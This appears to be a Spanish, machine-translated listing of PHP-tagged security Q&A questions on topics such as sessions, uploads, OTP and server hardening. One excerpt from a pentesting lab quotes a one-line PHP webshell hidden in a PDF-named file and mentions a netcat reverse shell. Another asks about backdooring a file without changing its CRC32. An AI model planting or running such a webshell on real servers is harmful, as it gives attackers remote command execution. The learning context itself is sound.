Preguntas con etiqueta 'php'

preguntas con etiqueta
1
respuesta

¿Existe una forma segura de compartir sesiones en el mismo servidor con subdominios diferentes?

Estoy estudiando un caso en el que tengo un backend REST (basado en php) y un front-end HTML + JS + PHP híbrido en diferentes subdominios: backend.example.com <-- A RESTful API to provide some XHR requests. *.example.com <-- Any other...
hecha 30.10.2014 - 19:41
3
respuestas

Riesgo de seguridad derivado de los datos pasados en $ _GET superglobal

Esta es una pregunta corta pero general. Soy relativamente nuevo en la programación en general. Mi sitio, que está escrito principalmente en PHP, se lanzará pronto y se está sometiendo a algunas restricciones de seguridad. Esto comenzó con la co...
hecha 28.07.2014 - 19:16
1
respuesta

la validación del certificado de cURL con curlopt_cainfo no funciona

Quiero validar mi certificado SSL cada vez que ejecuto llamadas a la API. He estado siguiendo esta guía: enlace Este es mi código: $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://api-3t.sandbox.paypal.com/nvp"); curl_setopt(...
hecha 10.06.2014 - 02:21
2
respuestas

¿Hay fallas en mi diseño para una cuadrícula OTP en papel?

Estoy tratando de implementar la autenticación de dos factores a bajo costo para un sitio web mío. Mi banco usa este tipo de sistema OTP basado en la red, por lo que quería emularlo en mi aplicación: Lastarjetassegeneranusandolasmismasfuncion...
hecha 09.08.2014 - 19:23
3
respuestas

Archivo de carga segura

He subido el archivo del sistema en mi proyecto php. Lo que hago al subir: 1) Compruebe la extensión de archivo y el tipo de mime de archivo. 2) Si la extensión y el tipo mime son tipos permitidos, guardo el archivo fuera del directorio...
hecha 04.02.2014 - 19:11
1
respuesta

No se pudo conectar a netcat reverse shell

Estoy haciendo un ejercicio de PentesterLab, tengo un webshell llamado 1.pdf y se puede incluir en index.php como un archivo PHP. Contiene código como este: %PDF-1.4 <?php echo system($_GET["cmd"]); ?> Ahora quiero crear una shell inv...
hecha 09.04.2014 - 06:39
2
respuestas

Cliente VPN - Capa de seguridad adicional o una característica inútil

Tengo un portal web corporativo que se utiliza para la colaboración del personal, incluida una interfaz de correo basada en la web conectada a la base de datos MySQL, calendario corporativo, almacenamiento de archivos, datos de contactos de clie...
hecha 18.02.2014 - 10:51
4
respuestas

¿En qué se debe enfocar cuando se endurece una pila LAMP? [cerrado]

Tengo un sitio que se ejecuta en un VPS. Configuré la pila LAMP y algunos otros programas personalmente. Esta es la segunda vez que configuro un VPS y estoy un poco preocupado por la seguridad. ¿Hay algunas cosas que debería tener en cuenta (con...
hecha 20.03.2014 - 13:36
2
respuestas

Cómo implementar el algoritmo de intercambio secreto de shamir usando AES_ENCYRPT

Estoy usando MySQL AES_ENCRYTP() y AES_DECRYPT() para almacenar detalles confidenciales en una base de datos, y actualmente estoy almacenando la clave en un archivo php fuera de la raíz web con acceso de lectura solamente....
hecha 12.06.2013 - 00:31
1
respuesta

¿Es posible agregar puerta trasera a un archivo con el mismo tamaño y suma de comprobación crc32 (4 bytes)?

¿Es posible agregar puerta trasera a un archivo con el mismo tamaño y suma de comprobación crc32 (4 bytes)? (El archivo no contiene el código de bytes, contiene el código del programa como texto. El idioma es PHP.)     
hecha 11.05.2014 - 13:28